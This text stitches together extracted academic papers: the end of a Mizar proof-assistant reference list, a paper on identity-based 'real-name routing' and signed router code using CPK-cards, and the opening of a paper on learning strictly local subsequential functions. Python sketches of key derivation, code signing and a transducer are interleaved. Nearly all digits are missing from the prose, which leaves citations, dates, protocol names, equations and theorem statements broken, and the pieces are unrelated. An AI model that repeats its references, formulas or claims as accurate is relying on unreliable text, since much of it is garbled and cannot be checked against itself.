nutshell. jour- nal of formalized reasoning, special issue: user tutorials i ( ): – doi . /issn. - / . grabowski a, korniłowicz a, naumowicz a. . four decades of mizar. journal of automated reasoning ( ): – doi . /s - - - . grabowski a, schwarzweller c. . revisions as an essential tool to maintain math- ematical repositories. in: proceedings of the th symposium on towards mechanized mathematical assistants: th international conference, calculemus ‘ / mkm ’ . berlin: springer-verlag, – doi . / - - - - _ . grabowski a, schwarzweller c. . towards automatically categorizing mathematical knowledge. in: ganzha m, maciaszek la, paprzycki m, eds. proceedings of the federated conference on computer science and information systems –fedcsis , wroclaw, poland, – . – . hayden s, fraenkel aa, zermelo e, kennison jf. . zermelo-fraenkel set theory by seymour hayden and john f. kennison. c. e. merrill columbus, ohio. hol light. . hol light. available at https://www.cl.cam.ac.uk/~jrh /hol-light/ . iancu m, kohlhase m, rabe f, urban j. . the mizar mathematical library in om- doc: translation and applications. journal of automated reasoning ( ): – doi . /s - - - . isabelle. . isabelle. available at https://isabelle.in.tum.de/ . jaśkowski s. . on the rules of suppositions in formal logic. studia logica. nakładem seminarjum filozoficznego wydziału matematyczno-przyrodniczego uniwersytetu warszawskiego. 
available at https://www.logik.ch/daten/jaskowski.pdf . korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /a: https://coq.inria.fr/ http://dx.doi.org/ . /fi- - http://dx.doi.org/ . /fi- - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /issn. - / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ https://www.cl.cam.ac.uk/~jrh /hol-light/ http://dx.doi.org/ . /s - - - https://isabelle.in.tum.de/ https://www.logik.ch/daten/jaskowski.pdf http://dx.doi.org/ . /peerj-cs. korniłowicz a. . on rewriting rules in mizar. journal of automated reasoning ( ): – doi . /s - - - . kusak e, radziszewski k. . semi_affine space. formalized mathematics ( ): – . lean. . lean. available at https://leanprover.github.io/ . matuszewski r, rudnicki p. . mizar: the first years. mechanized mathematics and its applications, special issue on years of mizar ( ): – . metamath. . metamath. available at http://us.metamath.org/mpegif/mmset.html. mizar. . mizar. available at http://mizar.uwb.edu.pl/ . naumowicz a. . enhanced processing of adjectives in mizar. in: grabowski a, naumowicz a, eds. computer reconstruction of the body of mathematics, volume ( ) of studies in logic, grammar and rhetoric. bialystok: university of białystok, – . naumowicz a. . interfacing external ca systems for gröbner bases computation in mizar proof checking. international journal of computer mathematics ( ): – doi . / . naumowicz a. . sat-enhanced mizar proof checking. in: watt sm, davenport jh, sexton ap, sojka p, eds. intelligent computer mathematics –international conference, cicm , coimbra, portugal, july ( ) – . proceedings, vol- ume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . naumowicz a. . automating boolean set operations in mizar proof checking with the aid of an external sat solver. journal of automated reasoning ( ): – doi . /s - - - . naumowicz a, byliński c. . improving mizar texts with properties and re- quirements. in: asperti a, bancerek g, trybulec a, eds. mathematical knowledge management, third international conference, mkm proceedings. volume of mkm’ , lecture notes in computer science. berlin: springer, – doi . / - - - - _ . naumowicz a, piliszek r. . accessing the mizar library with a weakly strict mizar parser. in: kohlhase m, johansson m, miller br, de moura l, tompa fw, eds. intelligent computer mathematics – th international conference, cicm , bialystok, poland, july ( ) – , proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . oryszczyszyn h, prazmowski k. . analytical metric affine spaces and planes. formalized mathematics ( ): – . pąk k. . improving legibility of natural deduction proofs is not trivial. logical methods in computer science ( ): – doi . /lmcs- ( : ) . rudnicki p. . obvious inferences. journal of automated reasoning ( ): – doi . /bf . rudnicki p, trybulec a. . mathematical knowledge management in mizar. in: proc. of mkm . korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - https://leanprover.github.io/ http://us.metamath.org/mpegif/mmset.html http://mizar.uwb.edu.pl/ http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /lmcs- ( : ) http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. rudnicki p, trybulec a. . 
on the integrity of a repository of formal mathematics. in: asperti a, buchberger b, davenport jh, eds. proceedings of mkm- . volume of lecture notes in computer science. berlin: springer-verlag, – . tarski a. . on well-ordered subsets of any set. fundamenta mathematicae : – doi . /fm- - - - . trybulec a, korniłowicz a, naumowicz a, kuperberg k. . formal mathe- matics for mathematicians. journal of automated reasoning ( ): – doi . /s - - -z. urban j. . xml-izing mizar: making semantic processing and presentation of mml easy. in: kohlhase m, ed. mathematical knowledge management, th international conference, mkm , bremen, germany, july ( ) – , revised selected papers. volume of lecture notes in computer science. berlin: springer, – doi . / _ . urban j. . automated reasoning for mizar: artificial intelligence through knowl- edge exchange. in: rudnicki p, sutcliffe g, konev b, schmidt ra, schulz s, eds. proceedings of the lpar workshops, knowledge exchange: automated provers and proof assistants, and the th international workshop on the implementation of logics, doha, qatar, november , . volume of ceur workshop proceedings: ceur- ws.org, available at http://ceur-ws.org/vol- /paper .pdf . urban j, hoder k, voronkov a. . evaluation of automated theorem proving on the mizar mathematical library. in: fukuda k, van der hoeven j, joswig m, takayama n, eds. mathematical software –icms , third international congress on mathematical software, kobe, japan, september ( ) – . proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . urban j, rudnicki p, sutcliffe g. . atp and presentation service for mizar formal- izations. journal of automated reasoning ( ): – doi . /s - - -y. urban j, sutcliffe g. . automated reasoning and presentation support for formalizing mathematics in mizar. in: autexier s, calmet j, delahaye d, ion pdf, rideau l, rioboo r, sexton ap, eds. intelligent computer mathematics, th international conference, aisc , th symposium, calculemus , and th international conference, mkm , paris, france, july ( ) – . proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . wiedijk f (ed.) . the seventeen provers of the world, foreword by dana s. scott. volume of lecture notes in computer science. berlin: springer doi . / . korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /fm- - - - http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / _ http://ceur-ws.org/vol- /paper .pdf http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on real-name routing and trusted connection based on ipv and cpk-card xie jianping . chinese decimal network working group, shanghai, china . shanghai decimal system network information technology ltd. shanghai, china e-mail: @ .cn nan xianghao . chinese decimal network working group, shanghai, china . shanghai decimal system network information technology ltd. shanghai, china e-mail: nanxh @ . com aliabzoraghchin department of computer engineering allame mohaddes noori institute of higher education mazandaran, iran e-mail: aliab@yahoo.com abstract—router is the basic component of the internet. in this scheme, identification technology is used for the first time in router design to provide address authenticity proof to prevent illegal access. 
provide proof of connection freshness to prevent reissue attacks; the first use of software identification technology, to provide the credibility of the router operating environment, to prevent trojan and other malicious software intrusion. the design also provides densification function to ensure privacy. this is a key security requirement for the next generation of internet protocols. this design method will be combined with the new addressing technology of geographical location addressing to construct the next generation of internet routers. the technology is also used in the design of new switches in telecommunications networks. keyword-ipv ; cpk-card; real-name routing; trusted connection i. introduction routers work in the network layer of the osi seven-layer protocol. their main function is to connect the network with the network and forward packets between the networks. routers have become the most important network equipment, so the research on the new generation of routers will become the core technology of the next generation of internet research. due to the ipv , ipv protocols that used in the internet, the new requirements for trusted cyber security connections are not met. the tcp/ip protocol has no security concerns, it does not provide address authentication, does not prevent unauthorized access, and does not protect against dos attacks. at present, all kinds of malicious software and spam information are rampant on the internet, which seriously pollutes the use environment of the internet and directly affects the survival of the internet. as a result, all countries over the world have developed a new generation of green internet research. in the european union's scientific institutions jointly issued the brad declaration, calling for a new generation of the internet. the european union has raised . billion euros to support future internet research and development. the u.s governments have also successive proposed identity authentication and addressing system as major scientific research tasks, and emphasized international cooperation. iso, the international standards body, put forward its plan for the future network in . in , chinese researchers xie jianping proposed the ipv geographical location addressing method, which solved the problem of combining ip address with geographical location. later, south korea also proposed the idea of geographical location addressing, and becoming the second country to propose a new method of addressing. cpk (combined public key) identity authentication technology is mature and can be used in internet protocol to realize trusted connection. international journal of advanced network, monitoring and controls volume , no. , so far, china had already had the technology foundation that research and development next generation router and future network protocol. ii. requirements for trusted connections in order to realize the trusted connection between routers and users, the user name (pc ) and route address (alfa) are identified for identity authentication. among routers, mutual authentication is made with ip address as identity, and mutual authentication is made with user name as identity between users. suppose that pc id is the user name of a client and alfaid is the ip address of a router. assume that alfaid="china- beijing-haidian-peking university" and betaid="china- beijing-haidian-tsinghua university". 
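the cpk scheme invoked here takes an identity string (a user name or a route address) directly as the public-key identifier, with the matching private key issued on a cpk-card. the paper does not spell out the derivation, so the following is only a minimal sketch under assumed parameters: a toy multiplicative group modulo a prime stands in for the elliptic-curve group a real deployment would use, an assumed 8x8 matrix pair plays the role of the combined-key matrices, and all names are ours rather than cpk's.

```python
import hashlib
import secrets

# Toy group: multiplicative group mod a Mersenne prime (a stand-in for the
# elliptic-curve group of a real CPK deployment; NOT production parameters).
P = 2 ** 127 - 1
G = 3
ROWS, COLS = 8, 8  # assumed matrix dimensions

# Key-management centre's secret matrix and the published public matrix.
secret_matrix = [[secrets.randbelow(P - 1) + 1 for _ in range(COLS)]
                 for _ in range(ROWS)]
public_matrix = [[pow(G, s, P) for s in row] for row in secret_matrix]

def _column_choices(identity: str) -> list[int]:
    """Hash the identity and use successive bytes to pick one entry per row."""
    digest = hashlib.sha256(identity.encode()).digest()
    return [digest[i] % COLS for i in range(ROWS)]

def public_key(identity: str) -> int:
    """Anyone can recompute this from the identity and the public matrix."""
    acc = 1
    for row, col in enumerate(_column_choices(identity)):
        acc = (acc * public_matrix[row][col]) % P
    return acc

def private_key(identity: str) -> int:
    """Only the key-management centre can compute this; it would be
    delivered to the entity on its cpk-card."""
    return sum(secret_matrix[row][col]
               for row, col in enumerate(_column_choices(identity))) % (P - 1)

# The route address itself acts as the public-key identifier.
alfa_id = "china-beijing-haidian-peking-university"
assert pow(G, private_key(alfa_id), P) == public_key(alfa_id)
```

the point of such a construction is that any party can recompute the public key of alfaid from the published matrix alone, which is what allows a router's address (or a user name) to serve directly as its verification key.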
now assume the starting address is alfaid and the destination address is betaid, and the connection process is shown in figure (dotted lines indicate that cpk-card is used and the original address is identified).. figure . data workflow diagram the ip packet of the original router passes through multiple routing routers and finally arrives at the destination router. illegal access is easy to access in the intermediate routing router. it can be seen from the working principle of the above router that previous routers only pay attention to the routing of the next hop and do not care where the packet comes from. therefore, if we do not solve the origin address verification, we cannot overcome the illegal access. some people try to solve the problem of illegal access by means of encryption, but under the condition of public key system, this is futile. for example, beta is the receiving party, and its public key is public, so anyone can encrypt beta, so beta still doesn't know who the sender is. in order to achieve the trusted connection, the router must meet the following four conditions: ) the primary ip address must be given to send proof of address; it can be verified by any one place; ) all routing routers verify the original address, and reject forward if there is any discrepancy; ) it can prevent illegal access and resist dos attacks. ) the internal computing environment of the router is reliable. iii. ipv connection environment the connection policy is as follows. path (all using ipv protocol and cpk-card) ) pc id signs the data with pc and delivers the signed data to the router alfaid. ) alfaid signs the time with alfa and forwards it to the next router, which verifies the signature of the original address. if the verification passes, the data is forwarded to the next router. ) gamid, lamid, betaid and other routing operations are the same as above. ) the betaid route forwards the data to the receiving user pc id. path (client adopts ipv protocol, but does not use cpk-card) : international journal of advanced network, monitoring and controls volume , no. , ) pc id does not use cpk-card but sends data to pc id via routing alfaid via pt converted to ipv protocol. ) the alfaid route obtains the packet source address as the public key and verifies the correctness of the source. path (the client does not use ipv protocol and cpk-card): ) pc id does not use cpk-card and uses ipv /ipv protocol to route data to pc id via alfaid. ) route through the deltaid and sigid routes to the betaid route and forward the data to pc id. path (the client adopts ipv protocol and uses cpk-card, but the middle v route does not use cpk- card): ) pc id using the local address as the public key to sign the data and sends data to pc id via route alfaid. ) the alfaid route takes the source address of the packet as the public key and verifies the correctness of the source. after verification of the source address, remove the original signature and use the local address as the public key signature. after the signature, forward the normal routing data. ) instead of using cpk-card, gamid obtains the source address of the packet as the public key and verifies the correctness of the source. if the address is not legitimate, the data is discarded and the normal routing data is forwarded. ) lamid, betaid and other routing operations are the same as above. ) the betaid route forwards the data to the destination pc id. the ipv v /v compatible data forwarding process is shown in figure . figure . 
data forward process diagram iv. ipv authentication function a. cpk-card cpk is a public key-based cryptography system that takes the identity of any entity directly as the public key, while the private key is distributed in the form of id-card. now, for example pc , alfa (uppercase) and so on respectively represent their public keys, pc , alfa (lowercase) and so on respectively represent their private keys. if it has been insert a cpk-card defined as alfaid on any router, the router becomes the identified router as alfaid. similarly, any router inserts a cpk-card defined as betaid, and the router becomes the identified router as betaid. the router is configured with cpk-card, which has the functions of digital signature and key exchange. the contents of cpk-card are as follows: let the router's ip address be alfa (alfa may be the real name of china. beijing. haidian. peking university etc. and it can be changed into machine executable code after the unified name translation). id-card format and size is as table . international journal of advanced network, monitoring and controls volume , no. , b. original address identification suppose the original place is alfaid, the next router is gammaid, alfaid sends data, mas alfaid→gammaid:{alfa, sign , beta, time data, checksum} where, sign is the signature of the original alfaid address, that is sign = sigalfa (time), betaid is the destination address, sig is the signature function, and alfa is the private key of the signature, provided by cpk-card. where data is data from the application layer, data may be plaintext or ciphertext. the router's job is to pass the data to the next router. table i. id-card format and size z : validate parameter b epwd(r )=z z : validate parameter b er (r ) ⊕ r =z identify definition b alfa private key b er (csk )=y private key b er (csk )=y issue unit b kmc signature of issue unit b sigkmc (mac) gammaid verifies the signature of original address: sig - alfa(time )=sign ' where sig- is the validation function and alfa is the public key. if sign =sign ', allow this connection, forward msg , and audit. identify replay attacks against time. v. ipv encryption function the structure of data is defined as follows: data={pc id,pc id,data, mac}, where pc id is the sender and pc id is the receiver. when the data is in plaintext: data={ pc id, pc id, clear-text, mac}; when the data is in ciphertext: data={pc id, pc id, coded-key, coded-data, mac}; if the encryption and decryption function is provided by the router, and alfa encryption and beta decryption are set, then data encryption can only be done in a non-online way. if the router is responsible for encryption and decryption, and this data is encrypted data, coded key and coded data need to be interpreted and a series of steps shall be performed: ) generate random number r, alfaid calculation key: key=r × (g); where g is the base point of the elliptic curve; key will be used to encrypt the data; ) ) calculate the sending key: r(beta)=coded- key, where beta is the public key of betaid and coded-key is sent to betaid. ) ) encrypt data: ekey (data) =cipher-text; send ciphertext cipher=text and coded-key to betaid. betaid receives a signal from the alfaid and automatically enters the decryption process.  betaid computes the inverse of the private key: beta- ;  betaid calculates the session key: beta- (coded-key)=key;  data decryption:dkey(cipher-text)= data. vi. ipv packet header format and encoding format a. 
packet header format the new features require the development of a new ip header format that includes at least the original address, the start address identifier, the destination address, the data, and the checksum. data encryption only affects the data format, not the ip packet header format. version category flow label payload length next header hop limit source address destination address time identification code (signature) byte international journal of advanced network, monitoring and controls volume , no. , b. ipv coding format the encoding format of ipv is shown in the following table . table ii. encoding format of ipv segment head segment address area entity code vendor code product code product class code country code district code year code single product code bit bit bit bit bit when the industrial standard "business rfid label data format" is adopted, the enterprise product coding data format is as follows: ) the basic data format of enterprise products is as follows: - - - ) when data exchange is used between management departments, the format of enterprise product data is: - - - - ) when data is exchanged between regions and management departments, the format of enterprise product data is: - - - - - ) when data are exchanged between countries: a) when exchanging with the itu-t e data system, the data format is: - - - - - - - . b) when exchanging with iso's object identifier data system, the data format is: - - - - - - - . c) when exchanging with the object identifier data system of iso/itu, the data format is: - - - - - - - . c. enterprise product ipv address format ) the basic ipv address format of enterprise products is: ] ] ] . ) when data exchange is used between management departments, the ipv format of enterprise product data is: ] ] ] ] . ) when data is exchanged between regions and management departments, the ipv format of enterprise product data is: ] ] ] ] ] ) when data are exchanged between countries, the ipv format is: a) when exchanging with the itu-t, e data system, the ipv data format is: ] ] ] ] ] ] ] b) when exchanging with iso's object identifier data system, the ipv data format is: ] ] ] ] ] ] ] c) when exchanging with the object identifier data system of iso/itu-t, the ipv data format is: ] ] ] ] ] ] ] international journal of advanced network, monitoring and controls volume , no. , vii. ipv trusted computing in order to ensure the credibility of the operation of the router, all the execution code in the router must be certified by the manufacturer (level certification), that is, the manufacturer sign on the appearance of all the execution code. each router has an authentication function (provided by cpk-card). a. proof of software code the manufacturer has a cpk-card, which can carry out manufacturer signature on all system software in the router. implementation software is divided into software identity (codeid) and software ontology (codebd), which are signed by the manufacturer respectively: sigmanufacturer (codeid) = sign sigmanufacturer (codebd)=sign where, sig is the signature function, manufacturer is the private key of the manufacturer, codeid is the name of the executing code, and codebd is the hash value of the executing code ontology. any executing code in the router has its own authentication codes, sign and sign . b. identification of software code the router inserts the cpk-card so that it has the cpk authentication function. 
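the manufacturer-signature step just described (one signature over the code identity codeid and one over a hash of the code body codebd) and the router-side check that follows can be illustrated with any signature scheme. the sketch below uses ed25519 from the third-party python cryptography package purely as a stand-in for the cpk signature function; the key objects and helper names are assumptions for illustration, not the paper's actual mechanism.

```python
import hashlib
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# Stand-in for the manufacturer's CPK signing key.
manufacturer_key = Ed25519PrivateKey.generate()
manufacturer_pub = manufacturer_key.public_key()

def sign_code(code_id: str, code_body: bytes) -> tuple[bytes, bytes]:
    """One signature covers the code identity, one covers a hash of the body."""
    sig_id = manufacturer_key.sign(code_id.encode())
    sig_body = manufacturer_key.sign(hashlib.sha256(code_body).digest())
    return sig_id, sig_body

def verify_code(code_id: str, code_body: bytes,
                sig_id: bytes, sig_body: bytes) -> bool:
    """Router-side check: execute the code only if both signatures verify."""
    try:
        manufacturer_pub.verify(sig_id, code_id.encode())
        manufacturer_pub.verify(sig_body, hashlib.sha256(code_body).digest())
        return True
    except InvalidSignature:
        return False

firmware = b"\x90\x90..."  # placeholder code body
s1, s2 = sign_code("routing-daemon", firmware)
assert verify_code("routing-daemon", firmware, s1, s2)
assert not verify_code("routing-daemon", firmware + b"tampered", s1, s2)
```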
there are two ways to verify the router: one is to uniformly verify when the router is turned on, and the code that fails to pass the verification is uniformly deleted to ensure that the router system returns to the original state; the other is that when software code is invoked, it is validated first and then executed. verify sign and sign respectively: sig - manufacturer (codeid)=sign ’ sig - manufacturer (codebd)=sign ’ where manufacturer is the public key, it is allowed execute if sign =sign 'and sign =sign ', otherwise it is rejected. in this way to ensure that the implementation of the router code is the manufacturer certification code, other code will not be executed, from the attack of viruses, trojans. viii. conclusion the tcp/ip protocol does not guarantee trusted connections, so it must be modified. based on geographical encoding and location addressing, three key techniques of trusted methods are proposed in this paper. use address identification mechanism to prevent illegal connection; adopt random q&a mechanism to prevent replay attack; software code can be identified by the mechanism, to prevent the intrusion of viruses, trojans. the above design method is fully applicable to the trusted connection of the physical layer. there are two kinds of physical layer: one is the physical layer defined in the seven-layer information network protocol, and the platform supporting the information network is the application program interface (api). the second is the physical layer defined in the telecommunications network, and the platform supporting the telecommunications network is the telecommunications reference point (trp). in the information network, if the network layer can guarantee the credibility of transmission, the security of the physical layer can be replaced by the network layer. however, the physical layer of the telecom network, without modification, cannot achieve trusted connection, cannot prevent illegal access. it is modified in exactly the same way as the router. references [ ] tang xiaodan etc. computer operating system (third edition) [m]. xi’an: xidian university press, . [ ] nan xiang-hao. cpk combined public key system [j]. information security and communication confidentiality, ( ): - . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] nan xianghao. cpk public key system and identification identification. [m]. beijing: people's posts and telecommunications press, . [ ] xie jianping, xu dongmei, etc. digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . 
learning strictly local subsequential functions jane chandlee university of delaware department of linguistics and cognitive science east main street newark, de janemc@udel.edu rémi eyraud qarma team laboratoire d’informatique fondamentale marseille, france remi.eyraud@ lif.univ-mrs.fr jeffrey heinz university of delaware department of linguistics and cognitive science east main street newark, de heinz@udel.edu abstract we define two proper subclasses of sub- sequential functions based on the concept of strict locality (mcnaughton and papert, ; rogers and pullum, ; rogers et al., ) for formal languages. they are called input and output strictly local (isl and osl). we provide an automata-theoretic characterization of the isl class and theorems establishing how the classes are related to each other and to strictly local languages. we give evidence that local phonological and morpho- logical processes belong to these classes. fi- nally we provide a learning algorithm which provably identifies the class of isl functions in the limit from positive data in polynomial time and data. we demonstrate this learning result on appropriately synthesized artificial corpora. we leave a similar learning result for osl functions for future work and sug- gest future directions for addressing non-local phonological processes. introduction in this paper we define two proper subclasses of sub- sequential functions based on the properties of the well-studied strictly local formal languages (mc- naughton and papert, ; rogers and pullum, ; rogers et al., ). these are languages that can be defined with grammars of substrings of length k (called k-factors), such that a string is in the language only if its own k-factors are a subset of the grammar. these languages have also been char- acterized by rogers and pullum ( ) as those that have the property expressed in the following theo- rem (which can be taken as a defining property): theorem (suffix substitution closure). l is strictly local iff for all strings u , v , u , v , there exists k ∈ n such that for any string x of length k − , if u xv , u xv ∈ l, then u xv ∈ l. these languages can model natural language phonotactic constraints which pick out contiguous substrings bounded by some length k (heinz, ; heinz, ). we define input strictly local (isl) and output strictly local (osl) functions which model phonological processes for which the target and triggering context are a bounded contiguous substring. here our use of ‘process’ is not specific to rule-based grammatical formalisms (such as spe (chomsky and halle, )). isl and osl func- tions model mappings from underlying forms to sur- face forms, which are also the bedrock of constraint- based frameworks like optimality theory (prince and smolensky, ). by showing that local phonological processes can be modeled with isl (and osl) functions, we pro- vide the strongest computational characterization of the input-output mappings these processes repre- sent. while it has been shown that phonological mappings describable with rules of the form a → b / c d (where a, b, c, and d are regular languages) are regular (johnson, ; kaplan and kay, ), and even subsequential (chandlee and heinz, ; heinz and lai, ), many logically possible regular and subsequential mappings are not plausible phonological mappings. since these im- plausible mappings cannot be modeled with isl or osl functions, we provide a more precise notion of transactions of the association for computational linguistics, vol. , pp. – , . 
action editor: alexander clark. submitted / ; revised / ; published november , . c⃝ association for computational linguistics. what constitues plausible phonological mappings. in addition, we present the input sl function learning algorithm (islfla) and prove that it identifies this class in the limit (gold, ) in poly- nomial time and data (de la higuera, ). our approach follows previous work on learning subse- quential transductions, namely oncina et al. ( ), oncina and varò ( ), castellanos et al. ( ), and gildea and jurafsky ( ). oncina et al. ( ) present ostia (onward subsequential transducer inference algorithm), an algorithm that learns the class of subsequential functions in the limit from positive data. ostia is only guaranteed to identify total functions exactly, but oncina and varò ( ) and castellanos et al. ( ) present the modifica- tions ostia-n, ostia-d, and ostia-r, which learn partial functions using negative data, domain information, and range information, respectively. in terms of linguistic applications, gildea and jurafsky ( ) show that ostia fails to learn the phonological mapping of english flapping when given natural language data. the authors modified ostia with three learning heuristics (context, com- munity, and faithfulness) and showed that the mod- ified learner successfully learns flapping and sev- eral other phonological rules. context encodes the idea that phonological changes depend on the con- text of the segment undergoing the change. commu- nity gives the learner the ability to deduce that seg- ments belonging to a natural class are likely to be- have similarly. lastly, faithfulness, by which under- lying segments are assumed to be realized similarly on the surface, was encoded with a forced alignment between the input-output strings in the data set. we believe this alignment removes ostia’s guarantee that all subsequential functions are learned. similar to the approach of gildea and jurafsky ( ), our learner employs a context bias because it knows its target is an isl function and therefore the transduction only involves bounded contiguous substrings. and similar to ostia-d (oncina and varò, ; castellanos et al., ), the islfla makes use of domain information, because it makes decisions based on the input strings of the data set. it also employs a faithfulness bias in terms of the prop- the alignment was similar to the string-edit distance mehod used in hulden et al. ( ). erty onwardness (see § ). the islfla is supported by a theoretical result like oncina et al. ( ), but learns a more restrictive class of mappings. we be- lieve the theoretical results for this class will lead to new algorithms which include something akin to the community bias and that will succeed on natural lan- guage data while keeping strong theoretical results. the proposed learner also builds on earlier work by chandlee and koirala ( ) and chandlee and jardine ( ) which also used strict locality to learn phonological processes but with weaker theoretical results. the former did not precisely identify the class of functions the learner could learn, and the latter could only guarantee learnability of the isl functions with a closed learning sample. the paper is organized as follows. § presents the mathematical notations to be used. § defines isl and osl functions, provides an automata-theoretic characterization for isl, and establishes some prop- erties of these classes. 
§ demonstrates how these functions can model local phonological processes, including substitution, insertion, and deletion. § presents the islfla, proves that it efficiently learns the class of isl functions, and provides demonstra- tions. § concludes. preliminaries the set of all possible finite strings of symbols from a finite alphabet Σ and the set of strings of length ≤ n are Σ∗ and Σ≤n, respectively. the unique empty string is represented with λ. the length of a string w is |w|, so |λ| = . the set of prefixes of w, pref(w), is {p ∈ Σ∗ | (∃s ∈ Σ∗)[w = ps]}, and the set of suf- fixes of w, suff(w), is {s ∈ Σ∗ | (∃p ∈ Σ∗)[w = ps]}. for all w ∈ Σ∗ and n ∈ n, suffn(w) is the single suffix of w of length n if |w| ≥ n; otherwise suffn(w) = w. if w = ps, then ws− = p and p− w = s. the longest common prefix of a set of strings s, lcp(s), is p ∈ ∩w∈spref(w) such that ∀p′ ∈∩w∈spref(w), |p′| < |p|. a function f with domain a and co-domain b is written f : a → b. we sometimes write x →f y for f(x) = y. when a and b are free monoids (like Σ∗), the input and output languages of a function f are the stringsets dom(f) = {x | (∃y)[x →f y]} and image(f) = {y | (∃x)[x →f y]}, respectively. following oncina et al. ( ), a subsequen- tial finite state transducer (sfst) is a -tuple (q,q , Σ, Γ,δ,σ), where q is a finite set of states, Σ and Γ are finite alphabets, q ∈ q is the initial state, δ ⊆ q × Σ × Γ∗ × q is a set of edges, and σ : q → Γ∗ is the final output function that maps states to strings that are appended to the output if the input ends in that state. δ recursively defines a map- ping δ∗: (q,λ,λ,q) ∈ δ∗; if (q,u,v,q′) ∈ δ∗ and (q′,σ,w,q′′) ∈ δ then (q,uσ,vw,q′′) ∈ δ∗. sfsts are deterministic, which means their edges have the following property: [(q,a,u,r), (q,a,v,s) ∈ δ ⇒ u = v ∧ r = s]. hence, we also refer to δ as the transition function, and ∀(q,a,u,r) ∈ δ, we let δ (q,a) = u and δ (q,a) = r. the relation that a sfst t recog- nizes/accepts/generates is r(t ) = { (x,yz) ∈ Σ∗ × Γ∗ | (∃q ∈ q)[ (q ,x,y,q) ∈ δ∗ ∧z = σ(q) ]} . since sfsts are deterministic, the relations they recognize are functions. subsequential functions are defined as those describable with sfsts. for any function f : Σ∗ → Γ∗ and x ∈ Σ∗, let the tails of x with respect to f be defined as tailsf (x) = { (y,v) | f(xy) = uv ∧ u = lcp(f(xΣ∗)) } . if strings x ,x ∈ Σ∗ have the same set of tails with respect to a function f, they are tail-equivalent with respect to f and we write x ∼f x . clearly, ∼f is an equivalence relation which partitions Σ∗. theorem (oncina and garcia, ). a function f is subsequential iff ∼f partitions Σ∗ into finitely many blocks. the above theorem can be seen as the functional analogue to the myhill-nerode theorem for regular languages. recall that for any stringset l, the tails of a word w w.r.t. l is defined as tailsl(w) = {u | wu ∈ l}. these tails can be used to par- tition Σ∗ into a finite set of equivalence classes iff l is regular. furthermore, these equivalence classes are the basis for constructing the (unique up to isomorphism) smallest deterministic acceptor for a regular language. likewise, oncina and gar- cia’s proof of theorem shows how to construct the (unique up to isomorphism) smallest sfst for a subsequential function f. we refer to this trans- ducer as the canonical transducer for f and denote it with t cf . the states of t cf are in one-to-one corre- spondence with tailsf (x) for all x ∈ Σ∗ (oncina and garcı́a, ). 
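to make the notation concrete, here is a minimal python sketch of suff_n, lcp, and a dictionary-based sfst with a final-output function σ. the class and helper names are ours, and the example transducer is simply the identity function over {a, b}, not a machine taken from the paper's figures.

```python
from typing import Optional

def suff(w: str, n: int) -> str:
    """suff_n(w): the length-n suffix of w, or w itself if |w| < n."""
    return w if len(w) <= n else w[len(w) - n:]

def lcp(strings: list[str]) -> str:
    """Longest common prefix of a non-empty list of strings."""
    prefix = strings[0]
    for s in strings[1:]:
        while not s.startswith(prefix):
            prefix = prefix[:-1]
    return prefix

class SFST:
    """A subsequential transducer (Q, q0, Sigma, Gamma, delta, sigma).

    delta maps (state, input symbol) -> (output string, next state);
    sigma maps final states to the string appended at end of input."""
    def __init__(self, q0, delta, sigma):
        self.q0, self.delta, self.sigma = q0, delta, sigma

    def apply(self, w: str) -> Optional[str]:
        q, out = self.q0, ""
        for a in w:
            if (q, a) not in self.delta:
                return None          # input not in dom(f)
            piece, q = self.delta[(q, a)]
            out += piece
        return out + self.sigma[q] if q in self.sigma else None

# Tiny example: a transducer over {a, b} that copies its input.
identity = SFST("q0", {("q0", "a"): ("a", "q0"),
                       ("q0", "b"): ("b", "q0")}, {"q0": ""})
assert identity.apply("abba") == "abba"
assert lcp(["abba", "abc"]) == "ab" and suff("abba", 1) == "a"
```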
